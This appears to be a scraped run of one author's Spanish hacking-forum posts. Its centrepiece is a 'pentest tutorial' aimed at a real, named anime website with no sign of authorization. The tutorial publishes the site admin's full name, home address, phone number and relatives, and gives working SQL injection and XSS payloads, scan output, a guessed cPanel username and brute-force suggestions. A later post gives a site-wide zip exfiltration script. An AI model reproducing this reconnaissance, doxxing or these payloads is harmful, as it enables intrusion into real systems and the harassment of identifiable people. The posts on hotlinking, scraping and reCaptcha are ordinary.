    foreach ($soundcloud->getTitle() as $title) {
     echo $title ."<hr />";
    }
    echo '</div>';
    break;
   default:
     echo "ERROR";
    break;
  }
  echo '</table>';
}

?>


Y bueno esta no es una entrada explicativa ni nada de eso solo dejare esto aqui y me iré, saludos!.
#26
Introduccion

Bienvenidos a este tutorial, si es que le podemos llamar de esa forma, ultimamente he estado publicando algo, entonces se me ocurrio que a ustedes les serviria un poco este tipo de tutorial ya que he buscado mucha informacion en la red y he recogido lo que me parece mas importante que pueden utilizar para este tipo de cosas.

Antes que nada decirles que hay un proyecto muy conocido de documentacion sobre vulnerabilidades web llamado OWASP el cual contiene una guia muy buena en la cual pueden aprender demasiado sobre este tipo de metodologia.



Esta imagen la he encontrado en google y como dicen que una imagen vale mas que mil palabras, pues aqui les dejo las fases para el proceso de analisis.


1.- Preparacion y Planeamiento

Lo primero es intentar obtener la mayor informacion sobre el objetivo a analizar.

En este caso tendre en mi objetivo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Es una pagina la cual visito continuamente, bueno veremos como hacer poco a poco, este tipo de prueba, claro yo lo hare a mi manera, ya que otros pueden utilizar otro tipo de herramientas o solo utilizar este concepto de manera que les pueda 'servir'.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta <- Esta es una herramienta muy util para mi me da mucha informacion sobre el dominio, en su version de paga es mucho mas util.

Con la informacion recogida se los datos siguientes:

Citar80.82.78.206 esta alojado en un servidor dedicado de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
El email del admin es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Su nombre es Juan Celis Garcia
Su calle: Peralvillo 22 edificio c-301
Su colonia: Colonia Morelos
Su ciudad: Mexico City
Su pais: Mexico
Su codigo postal: City 06200
Su telefono: 55269882
Informacion sobre el servidor: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Usaba Cloudflare

PHP_VERSION    5.4.36
Dominio asociado: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Gracias al uso de las redes sociales hoy en dia podemos sacar mucha informacion, por ejemplo usando Facebook, coloco el correo que encontre anteriormente:

[email protected] y encuentro esto:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ok, tiene su correo con su cuenta de animextremist pero veo que tiene 2 amigos, dentro de esos dos amigos busco a Juan Celis! :P

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

He aqui Juan Celis Administrador de AnimeXtremist Mi idolo :) 

Encontrando mas informacion:

Su hermana: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ahora podemos buscar sobre el en google utilizando Su nombre y donde estudio, ejemplo: Juan celis Unitec, esa informacion la saque desde facebook.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Con esto concluimos que el uso de las redes sociales para obtener informacion es de demasiada ayuda, algunas redes sociales pueden ser:

* Twitter
* LinkedIn
* Google+
* Instagram
* Facebook


Tambien si este fuera un servidor compartido, podriamos hacer uso de BING para buscar algunos de lso dominios compartidos, ejemplo:

IP: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Aqui no se acaba, podemos intentar recopilar informacion de subdominios, utilizando Google.

site: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -site:elsitio.com

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Tambien en este ejemplo con Shodan hemos encontrado su panel de cPanel:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Otra manera de buscar informacion con google es utilizando sus keywords, por ejemplo:

site:animextremist.com filetype:txt

Siguiendo con las keywords de google pues como hay bastantes formas utiles solo hay que jugar con ellas, de todas maneras si puedo pronto hare algun tutorial sobre Google Hacking :P

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
?subaction=showcomments
&id=1195023652
&archive=
&start_from=
&ucat=3
&

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Algunos errores:


site:animextremist.com intext:"seijixt"


Warning: include(../comentarios/show_news.php): failed to open stream: No such file or directory in /home/seijixt/public_html/noticias/noti543.php on line 401

Warning: include(): Failed opening '../comentarios/show_news.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/seijixt/public_html/noticias/noti543.php on line 401

Warning: include(../comentarios/show_news.php): failed to open stream: No such file or directory in /home/seijixt/public_html/noticias/noti543.php on line 404

Warning: include(): Failed opening '../comentarios/show_news.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/seijixt/public_html/noticias/noti543.php on line 404

2004.12.08 19:46 B D:\Juan\Animextremist\animextremist\series\dbzpelis_archivos\dbzpeli1.jpg --> 65.110.45.90 /public_html/series/dbzpelis_archivos dbzpeli1.jpg

2004.12.08 19:46 B D:\Juan\Animextremist\animextremist\series\dbzpelis_archivos\dbzpeli2.jpg --> 65.110.45.90 /public_html/series/dbzpelis_archivos dbzpeli2.jpg

2004.12.08 19:46 B D:\Juan\Animextremist\animextremist\series\dbzpelis_archivos\dbzpeli3.jpg --> 65.110.45.90 /public_html/series/dbzpelis_archivos dbzpeli3.jpg

2004.12.08 19:46 B D:\Juan\Animextremist\animextremist\series\dbzpelis_archivos\dbzpeli4.jpg --> 65.110.45.90 /public_html/series/dbzpelis_archivos dbzpeli4.jpg



Con esto tenemos el posible nombre de usuario del cPanel :D
seijixt :P y la ruta :D, hace un tiempo hice un post sobre No tienes permitido ver los links. Registrarse o Entrar a mi cuenta el cual podriamos intentar, o simplemente intentar acceder con las No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Otra cosa que podemos hacer es usar algun brute forcing de directorios o simplemente hacer un crawler o spider para encontrar mas informacion.

Un ejemplo Yo utilizo ZAP de OWASP o DirBuster para buscar URL's, puntos de entrada, y directorios de la pagina que no son muy accesibles... Burp Suite tambien es una herramienta genial para esto.

Gracias a ZAP encontramos una posible Inyeccion SQL, ademas de un monton de urls y parametros:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'
SQLI: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta and 0 union select version() %23  hola

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Usa una base de datos MySQL. Cuando obtengamos los datos solo es necesario usar algun Admin Finder Online o una tool que te hayas creado.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Lo siguiente es reconocer los servicios que se estan usando. Aqui utilizaremos herramientas como NMAP.

Ejemplo: nmap -sV -T4 -O -Pn 80.82.78.206

CitarStarting Nmap 6.40 ( No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ) at 2015-03-22 19:33 Hora estándar Montañas (México)

Nmap scan report for 80.82.78.206

Host is up (0.19s latency).

Not shown: 982 closed ports

PORT     STATE    SERVICE      VERSION

21/tcp   open     ftp          Pure-FTPd

22/tcp   open     ssh          OpenSSH 5.3 (protocol 2.0)

25/tcp   open     smtp         Exim smtpd 4.84

53/tcp   open     domain

80/tcp   open     http         Apache httpd 2.2.29 ((Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4)

110/tcp  open     pop3         Dovecot pop3d

135/tcp  filtered msrpc

139/tcp  filtered netbios-ssn

143/tcp  open     imap         Dovecot imapd

443/tcp  open     ssl/http     Apache httpd 2.2.29 ((Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4)

445/tcp  filtered microsoft-ds

465/tcp  open     ssl/smtp     Exim smtpd 4.84

587/tcp  open     smtp         Exim smtpd 4.84

993/tcp  open     ssl/imap     Dovecot imapd

995/tcp  open     ssl/pop3     Dovecot pop3d

1025/tcp filtered NFS-or-IIS

3306/tcp open     mysql        MySQL (unauthorized)

6129/tcp filtered unknown

Device type: general purpose|firewall|WAP|webcam

Running (JUST GUESSING): Linux 2.6.X|3.X|2.4.X (94%), Check Point Linux 2.6.X (85%), Tandberg embedded (85%), Fortinet Linux 2.6.X (85%)

OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6.18 cpe:/o:linux:linux_kernel:2.4 cpe:/h:tandberg:vcs cpe:/o:fortinet:linux_kernel:2.6

Aggressive OS guesses: Linux 2.6.32 - 2.6.39 (94%), Linux 3.2 - 3.6 (92%), Linux 2.6.32 - 3.0 (92%), Linux 3.4 (91%), Linux 2.6.39 (91%), Linux 2.6.32 (91%), Linux 2.6.32 - 2.6.35 (90%), Linux 3.1.9 (90%), Linux 3.5 (89%), Linux 3.0 - 3.9 (88%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 26 hops

Service Info: Host: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



OS and Service detection performed. Please report any incorrect results at No tienes permitido ver los links. Registrarse o Entrar a mi cuenta .

Nmap done: 1 IP address (1 host up) scanned in 44.42 seconds

Una de las paginas que no mencione aqui para obtener una mayor informacion es ir a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y ver las paginas de antes ya que muchas veces se encuentran todavia disponibles.

XSS: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"></title><script>alert(/arthusu/)</script>



2.- Testeo y Evaluacion

Este paso mas que nada es encontrar vulnerabilidades y obtener acceso, para ello podemos ayudarnos de un sin fin de herramientas pero las que mas utilizo son:

Citar* Acunetix (Detectar vulnerabilidades)
* Vega (Escaner de Vulnerabilidades)
* Waf00f (Detectar Firewall)
* Nikto (Detectar vulnerabilidades)
* NMAP (Servicios)
* ZAP (Directorios,Campos de entrada,  DirBuster)
* Burp Suite  (Directorios, Spider)
* Nessus (Detectar Vulnerabilidades)
* Metasploit (Explotar Vulnerabilidades)
* Google (Recolectar informacion)

A mi en lo personal no me gusta muchos utilizar herramientas, no es por que no sean buenas, sino por que muchas veces hacen mucho "ruido" y alertan rapidamente a un firewall o al administrador. Ademas de aveces tardar demasiado.

En el paso anterior encontramos una vulnerabilidad SQLi sin necesidad de usar herramientas.

Pero no hay nada de malo en usar herramientas ya que traen muchas vulnerabilidades que puedes no conocer ya que sea actualizan dia a dia. Y podemos obtener informacion muy interesante de ellas.



Hay otro tipo de ataque que al parecer se presenta mucho en esta pagina que es bruteforce.


Lo siguiente que podemos hacer es buscar exploits para los servicios anteriores usando Google, ejemplo:


OpenSSL/1.0.1e-fips  exploit




3.- Redaccion de Reportes


Esta suele ser la parte mas aburrida ya que tienes que redactar todo lo que hicistes para encontrar vulnerabilidades, ya sea a nivel web o sistema, tienes que redactarlo bonito de una manera que los "clientes" lo entiendan. Para una mejor redaccion puedes utilizar una plantilla e ir ordenando todas las vulnerabilidades encontradas anteriormente en un archivo final entregado al cliente.

Les dejare algunas plantillas utiles para crear su reporte final.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Despedida


Hasta aqui termina este pequeño "tutorial", intente no hacerlo largo por que se aburririan. Espero que a mas de uno les sea de utilidad. Le agradesco a Cesar de Alguienenlafisi por ayudarme, y a todas las personas que me han ayudado en este largo camino. [/font]
#27
Buenas hoy estaba escuchando musica y luego un amigo (NoVaTo) me hablo por Skype diciendome que si tenia algun script o shell que comprimiera toda la pagina web para bajarsela, entonces como no tenia me puse a buscar como hacerlo uno a mi manera... hasta que al final di con bola... pues nada mas les dejo el script par aque lo usen cuando quieran:

Código: php
 <?php
// Si son demasiados archivos colocamos el tiempo limite en 0 (sin limite)
set_time_limit(0);
/*
  @autor : Arthusu
  @fecha : 15/03/2015
  @descripcion : Compresor de todos los archivos del directorio
  @archivo : compresor.php
*/

// definimos las variables (las podemos modificar segun sea nuestro caso)
$nombre_del_archivo_comprimido = "comprimido.zip"; // el nombre del archivo a generar
$ruta_relativa = ""; // el directorio que nos encontremos. Ejemplo: images/algo/ para generar un link correcto

if(phpversion() >= "5.2.0"){ // verificamos que contengan la version correcta para crear archivos zip
  $zip = new ZipArchive(); // Creamos un nuevo objeto
  if($zip->open($nombre_del_archivo_comprimido,ZIPARCHIVE::CREATE) === TRUE){ // creamos un archivo
   $iterator = new RecursiveDirectoryIterator(__DIR__); // recorremos el directorio
   $recursiveIterator = new RecursiveIteratorIterator($iterator); // recorremos los directorios dentro de otros directorios y asi sucesivamente

   foreach($recursiveIterator as $entry){ // recorremos los archivos
     if(is_file($entry->getRealPath())){ // verificamos que sea archivo
      // debug
      //echo $entry->getRealPath()."\n";
         $zip->addFile($entry->getRealPath()); // lo agregamos al zip
        }
   }
   // mostramos un enlace con los archivos
   echo $zip->numFiles .' archivos comprimidos: <a href="http://'.strip_tags($_SERVER["HTTP_HOST"]. "/" . $ruta_relativa . $nombre_del_archivo_comprimido).'">Descargar Archivo</a>';
  }else{
   // si no se crea el archivo mostramos el error
   echo "Ha ocurrido un error: ".$zip->getStatusString();
  }
  // cerramos el archivo zip
  $zip->close();
}else{
  // si la version no es correcta mostramos un mensaje
  echo "Su version de PHP debe ser 5.2.0 o superior";
}
?>


El uso es bastante facil.

1.- Subir el archivo a la carpeta que quieras comprimir
2.- Ejecutar el archivo en la url: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3.- Te generara un link donde descargar el archivo

Hay dos variables que puedes modificar dentro del archivo:

$ruta_relativa - Esta variable la modificas en caso de que te encuentres en una ruta relativa en alguna carpeta de la web, ejemplo: jquery/imagenes/, con eso nos generaria un link como el siguiente:  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

$nombre_del_archivo_comprimido - Aqui puedes especificar el nombre del archivo resultante

Nota: Otra cosa a tomar en cuenta es que el script tarda dependiendo de que tantos archivos tenga que guardar o recorrer, puede tardar varios minutos dependiendo de que tantos archivos contenga tu sitio.

Y bueno eso es todo espero que la herramienta les sea de utilidad.
#28

¿Quieres parar los No tienes permitido ver los links. Registrarse o Entrar a mi cuenta? ¿Consume mas ancho de banda tu sitio web cada mes? ¿No hay presupuesto para conseguir un No tienes permitido ver los links. Registrarse o Entrar a mi cuenta? ¿Quieres probar hotlink en imagenes de tu sitio web? Aqui mostraremos informacion sobre el uso de un archivo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para detener el hotlinking y el robo de ancho de banda.

¿Como evito el hotlinking y el robo de ancho de banda?

Puede evitar el hotlinkin de su sitio colocando un archivo .htaccess en la carpeta raiz de su sitio en el directorio principal. El punto de inicio significa que el archivo esta "oculto", por lo que es posible que desee editar su archivo como htaccess.txt subirlo a tu servidor y cambiarle el nombre a tu archivo a .htaccess.

Comuniquese con su proveedor de alojamiento web sobre como acceder a sus directorios y configurar el archivo .htaccess.

Ejemplo: La URL de su sitio es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Para detener el hotlinking de imagenes desde otros sitios podemos reemplazar nuestra imagen mostrando otra (u9HLjv8.jpg) de algun hosting de imagenes, colocando este codigo en su archivo .htaccess.

Código: text
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?misitio\.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ http://i.imgur.com/u9HLjv8.jpg [L]


La primera linea del codigo anterior comienza la reescritura. La segunda linea de bloque dice que cualquier sitio que no sea su propia URL (sitio.com). El codigo [NC] significa "No case", que significa que no importa si la URL esta en minusculas o mayusculas. La tercera linea decimos que se permiten referencias vacias. La ultima linea coincide con los archivos que terminan con la extension jpeg, jpg, gif, bmp, o png. Esta es sustituida por la imagen u9HLjv8.jpg desde el servidor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Usted facilmente podria utilizar una imagen de su sitio web para hacer hotlinking referenciando a ese archivo.


Para realizar hotlinking a solo algunos sitios webs especificados, como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, etc. Pero permitiendo a otros sitios webs las imagenes, realizamos la siguiente configuracion.

Código: text
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://(.+\.)?myspace\.com/ [NC,OR]
RewriteCond %{HTTP_REFERER} ^http://(.+\.)?blogspot\.com/ [NC]
RewriteRule .*\.(jpe?g|gif|bmp|png)$ http://i.imgur.com/u9HLjv8.jpg [L]

Puede añadir tantos dominios diferentes segun sea necesario. Cada linea RewriteCond debe terminar con el codigo [NC,OR]. NC significa que ignora si es mayuscula o minuscula. OR significa "OR Next" como decir, si no coincide entonces sigue con la siguiente linea. El ultimo dominio listado omite el codigo OR ya que detiene la lista de dominios despues de la ultima linea RewriteCond.

Usted puede mostrar una pagina 403 Forbidden en lugar de una imagen. Solo reemplace la ultima linea de codigo de lo anterior con lo siguiente.

Código: text
RewriteRule .*\.(jpe?g|gif|bmp|png)$ - [F]


Advertencia: No utilice el archivo .htaccess para redirigir a paginas HTML, ya que con hotlinking de imagenes solo pueden ser reemplazadas con otras imagenes y no con archivos HTML.

Con cualquier archivo .htaccess, podemos bloquear parte del trafico legitimo (como usuarios detras de proxys o firewalls) usando estas tecnicas.
#29
Presentaciones y cumpleaños / Hola Underc0de!!
Febrero 06, 2015, 03:00:57 PM
Hola Soy Arthusu soy nuevo aqui  ::), llevo desde el 2011 registrado y nunca me habia presentado, me gusta planchar y lavar! siempre y cuando me paguen  8).
Me gusta la gente seria (por que me paga dinero  8) ).
Aveces en mis tiempos libres (cuando trabajo  ;D ) me paso por el irc para joder con los que estan ahi (le mando un saludo a coco el troll mas grande de la historia).
PD: espero me traten bien, y cuando se sientan mal no se olviden pasar por mi perfil y ver mi avatar (saber que siempre hay alguien que se siente mas mal que ustedes).
Saludos!
PD2: Espero me reciban con los brazos abiertos!
#30
Back-end / Web Scraping
Enero 28, 2015, 03:19:21 PM
Definiendo Web scraping

El internet hoy en dia es un gran deposito de informacion, la porcion mas grande puede ser accedida a traves de la World Wide Web. Siendo el navegador web la herramienta estandar para acceder a este tipo de informacion.

Aunque el navegador es una gran herramienta, que se limita a los usuarios. Con un gran conjunto de informacion disponible en linea, seria util que las computadoras pudieran grabar toda esa informacion de forma automatica de alguna manera. Esto podria ser util para reutilizacion de datos, el analisis o creacion de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.   

Muchos de los sitios web de hoy en dia proporcionan el acceso a su contenido con la ayuda de una No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, ya sea a traves de protocolos No tienes permitido ver los links. Registrarse o Entrar a mi cuentao No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Los usuarios pueden recuperar el contenido del sitio mediante la API y reutilizarlo como deseen (por supuesto, siempre respetando los terminos y condiciones del sitio). Por desgracia la mayoria de los sitios webs no proporcionan una API y la unica manera de conseguir los datos es a traves de web scraping, tambien conocido como spidering o screen scraping.

Web scraping es un metodo que implica la recuperacion automatica por programas, de los datos semi-estructurados de paginas webs. Comunmente hoy una pagina web esta construida en un lenguaje de marcas tales como HTML o XHTML. Como se muestra a continuacion:



Código: html5
<html>
<head>
<title>Hola HTML</title>
</head>
<body>
<p>Hola Mundo!</p>
</body>
</html>





Como se puede ver en el codigo anterior, la informacion aqui es la cadena "Hola Mundo!", mientras que la mayor parte del contenido de la pagina es el formato HTML , lo que hace que el navegador del usuario muestre "Hola Mundo!", si usted necesita conseguir esa parte del contenido "Hola Mundo!" mediante un programa informatico, lo que tendra que hacer es descargar la pagina y analizar el contenido de manera adecuada, lo que elimina todo el codigo HTML superfluo para llegar al contenido de texto puro. Por supuesto el ejemplo de marcado dado anteriormente es muy simple. En realidad las paginas webs son mucho mas complejas, que alberga diversos elementos HTML en una variedad de combinaciones.
Algunos de los HTML pueden estar mal formados, las etiquetas que faltan pueden estar anidadas incorrectamente. Los navegadores modernos suelen ignorar estos problemas y tratar de corregir las inconsistencias antes de mostrar una pagina. Sin embargo cuando usted esta escribiendo un web scraping usted tiene que tomar todos estos factores en consideracion. Esto puede hacer que el analisis de una pagina web sea una tarea dificil. Afortunadamente, hay varias bibliotecas y herramientas disponibles para que dicha mision sea mas facil para nosotros.

Razones para utilizar Web Scraping

Ahora que hemos definido lo que es web scraping y tenia una idea superficial sobre ello, tenemos que responder a la pregunta ¿por que? ¿Por que molestarme en realizar web scraping? llegarse a responder esta pregunta le resultara muy util para ampliar sus habilidades de web scraping en varios dominios.

Agregar y buscar un tipo especifico de datos.

Aunque diferentes sitios web ofrecen diferentes tipos de datos, la mayoria de ellos estan conectados semanticamente de alguna manera. Por ejemplo, si usted esta interesado en blogs relacionados con la ciencia, y tiene alrededor de 100 blog que se alimenta leyendo, seria dificil recorrer todos ellos regularmente, y encontrar articulos que usted realmente desea. Sin embargo usted puede programar un script de web scraping que alimente en una sola pagina todos los blogs y haciendo busquedas de interes en particular, transfiriendo asi la monotonia de datos filtrados en una sola maquina.

Obtener acceso automatizado a recursos web

Si es necesario comprobar regularmente el precio de algun producto en una tienda de comercio electronico (ecommerce) para ver si algun descuento esta disponible, se podria visitar el sitio regularmente para ver si se encuentra algo. Sin embargo, eso seria lento y tedioso. Una mejor manera seria escribir un pequeño programa de web scraping que visite regularmente el sitio y obtenga los precios y que envie un correo si encuentra algun descuento. Tambien podria comprobar las imagenes y descargarlas en su ordenador.

Combinar la informacion y presentarla en formato alternativo

Este metodo es uno de los usos mas comunes de web scraping, tambien conocido como "mashups", le permite reunir diferente tipo de informacion de varios sitios y combinarlos de una manera interesante que seria muy util para un usuario final.

Legalidad de web scraping

Despues de haber visto algunos usos de web scraping, tenemos que mirar un tema importante con relacion a la legalidad de web scraping. La legalidad de web scraping es una pregunta bastante compleja, debido a gran parte a las leyes de derecho de autor y de propiedad intelectual. Desafortunadamente, no hay una respuesta corta y facil que quede completamente clara, sobre todo por que estas leyes pueden variar en cada pais. Sin embargo hay varios puntos fundamentales para la examinacion de una pagina web potencial a realizar web scraping.

En primer lugar, los sitios web contienen a menudo documentos con terminos de servicio (TOS), terminos o condiciones de uso, o acuerdos de usuarios. Estos se localizan generalmente a lo largo del pie de pagina o la seccion de ayuda.

Estos tipos de documentos son mas comunes en sitios webs grandes o empresas reconocidas. Leer y enteder esto para saber los terminos sobre web scraping automatizado con scripts. Si usted esta realizando web scraping con el unico proposito de utilizar propiedad intelectual de otra persona en su propio sitio web, usted esta violando claramente los derechos de autor, esto es una obviedad. Si usted esta realizando web scraping a sitios de sus competidores y utilizando en su propio sitio lo cual es claramente ilegal. Ademas, incluso si usted no esta utilizando el web scraping para la reunion ilegal de datos, pero su script carga el servidor con varias solicitudes, perjudicando de este modo el servidor, esta usted violando los terminos del sitio. Asi que asegurese de que su script de web scraping no degrada de ninguna manera el servidor del sitio remoto.

Ahora con todos los problemas legales fuera del camino (pero aun a la vista), estamos listos para salir adelante con la parte de la codificacion.

     
#31
Pentesting / DIOS (Dump in One Shot) Explicado
Enero 07, 2015, 03:39:56 AM


Buenas Underc0de les traigo un PDF el cual es para realizar el metodo DIOS en inyecciones SQL, en este caso MySQL. Con el cual podremos sacar todos los registros (bases de datos, tablas y columnas) de 1 sola consulta, lo cual ahorra un monton de trabajo. Les dejo el PDF:

Ver online: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descargar: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#32
Off Topic / No puedo entrar a underc0de
Noviembre 18, 2014, 05:52:31 PM
Hola, bueno queria decirles que no puedo entrar a underc0de desde mi pc, no se si me bloquearon la ip, solo puedo entrar por proxy... solo queria pedir si se me puede desbloquear de alguna forma, gracias!

Saludos
#33
Back-end / PHP PDF Parte de 1-10
Septiembre 29, 2014, 12:42:22 PM




Hola Underc0de he escrito un par de partes de PHP en mi blog mayormente es programacion estructurada, ya que casi no se ve mas que solo el concepto de POO espero mas adelante hacer la de POO ya que es un tema bastante extenso que llevaria varias partes, en este caso les traigo 10 partes que converti en un PDF desde mi blog cuenta con 114 paginas

Lo pueden descargar o ver desde aqui: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#34
Zona Webmaster / Resumen reCaptcha
Septiembre 29, 2014, 12:11:27 PM
¿Que es reCaptcha?

reCaptcha te ayuda a prevenir a que abusen de tu sitio (que metan spam o que registren cuentas falsas) el captcha asegura que un humano esta realizando la accion.

API Keys



Para obtener una clave es necesario registrar nuestro dominio:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Puedes poner 1 o mas dominios separarlos por comas, ejemplo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Por defecto todas las claves funcionan en "localhost" con la ip 127.0.0.1 para que puedas hacer pruebas en tu servidor local.

Integrarlo

Para poder integrar reCaptcha a tu sitio solo es necesario realizar los tres pasos siendo el tercero opcional:

1.- Del lado del cliente: mostrar el widget recaptcha (Requerido)
2.- Del lado del servidor: verificar la solucion (Requerido)
3.- Personalizar (Opcional)

En la mayoria de los formularios webs tu usualmente tienes dos archivos: el formulario con los campos y el script que procesa los campos del formulario. Estos dos archivos corresponden al paso 1 y 2. Por lo tanto se tendran que modificar 2 archivos diferentes en la mayoria de los casos.

Hay dos maneras de agregar reCaptcha (a) con plugins o (b) sin plugins. Nosotros veremos la primera forma, que es con plugins utilizando PHP.


Usando reCaptcha en PHP

Para utilizar reCaptcha con PHP necesitas descargar la libreria:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

De los archivos que vienen en el zip comprimido solo necesitas 1 archivo el que se llama recaptchalib.php los demas son ejemplos y cuestiones legales.

Despues de haberte registrado para poder usar la clave del API podemos proceder.

Del lado del cliente: como crear el captcha la imagen aparece

Si quieres utilizar la libreria reCaptcha de PHP para mostrar el widget, solo necesitas insertar la siguiente parte de codigo dentro de un elemento <form> donde el widget CAPTCHA sera colocado:



Código: php
<?php

require_once('recaptchalib.php');

$clavepublica = "Aquivatuclavepublica"; // esta la obtienes cuando te registras

echo recaptcha_get_html($clav5epublica);

?>


Con el codigo anterior tu formulario luciria como el siguiente:


Código: php
<!DOCTYPE html>

<html>

<head>

<title>reCaptcha</title>

</head>

<body>

<!-- El body es requerido ya que sino el captcha no se mostrara en algunos navegadores -->

<form method="post" action="verificar.php">

  <?php

   require_once('recaptchalib.php');

   $clavepublica = "Aquivatuclavepublica"; // esta la obtienes cuando te registras

   echo recaptcha_get_html($clavepublica);

  ?>

<input type="submit" />

</form>

</body>

</html>

 




No olvides reemplazar en la variable $clavepublica donde dice Aquivatuclavepublica por tu clave publica.

Si miras en el formulario se encuentra en el atributo action verificar.php este archivo es importante ya que aqui sera procesado el formulario, este archivo deberia de encontrarse en la misma localizacion que el archivo del formulario html.

Con la funcion require_once() llamamos al archivo requerido que es la libreria para el captcha, si este no se encuentra el script no puede continuar, recuerda colocar la ruta correctamente require_once(turuta/dondeseencuentra/recaptchalib.php)

Del lado del cliente: como probar que lo introducido por el usuario es lo correcto
El siguiente codigo deberia ser puesto al incio del archivo verificar.php:


Código: php

<?php

require_once('recaptchalib.php');

$claveprivada = "Tuclaveprivada";

$respuesta = recaptcha_check_answer($claveprivada,

     $_SERVER["REMOTE_ADDR"],

     $_POST["recaptcha_challenge_field"],

     $_POST["recaptcha_response_field"]);

if (!$respuesta->is_valid) {

  // El captcha se metio incorrectamernte

  die("El captcha no se ingreso correctamente. Ve atras y vuelve a intentarlo". $respuesta->error);

}else{

  // Tu codigo para manejar una verificacion correcta

  echo "Bien hecho";

}

?>


En el codigo de arriba:

* recaptcha_check_answer - retorna un objeto representando cuando el reto se completo correctamente
* Si $respuesta->is_valid si es true entonces puede continuar con el procesamiento del formulario
* Si $respuesta->is_valid si es false entonces muestra de nuevo otra imagen en el captcha. En caso de que $respuesta->error ocurra un error el captcha mostrara el codigo de error.

Nota importante: No confundas la clave publica con la clave privada.

Estaté seguro de que hayas colocado el array superglobal $_POST para usar el captcha.

Hasta aqui llega nuestro pequeño resumen de reCaptcha si quieres obtener mas informacion puedes consultar: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#35
Saben de algún pograma para crer audio me refiero a sonidos, por ejemplo:

badadatumsss
pummm
tapassss
repeenrepeen
tararara

osea que ya tenga esos sonidos por ejemplo y yo los pueda ir agregando y al final dale producir al sonido y tenga todos esos sonidos en un solo audio pero los sonidos que ya vengan en el programa

espero que me puedan ayudar saludos

pd: escribí rápido ando desde un ciber, saludos Xd
#36
Back-end / [PHP]Libreria cURL MiniTutoriales
Julio 10, 2014, 03:30:07 AM
 [Parte 1] CURL en PHP     

Instalacion Lo primero que debemos hacer para comenzar a utilizar cURL es instarlo, para ello puedes descargarlo desde: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

La guia para la instalacion de cURL compilandolo esta aqui: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En este caso no veremos en detalle esto ya que pues vienen los pasos muy detallados en la pagina de la documentacion de cURL, por lo cual veremos solamente como instarlo en la distribucion de ubuntu usando un solo comando:
  Instalar cURL con un solo comando desde la terminal:
 
sudo apt-get install php5-curl
Reiniciar el servidor apache para que funcione cURL:

  sudo /etc/init.d/apache2 restart
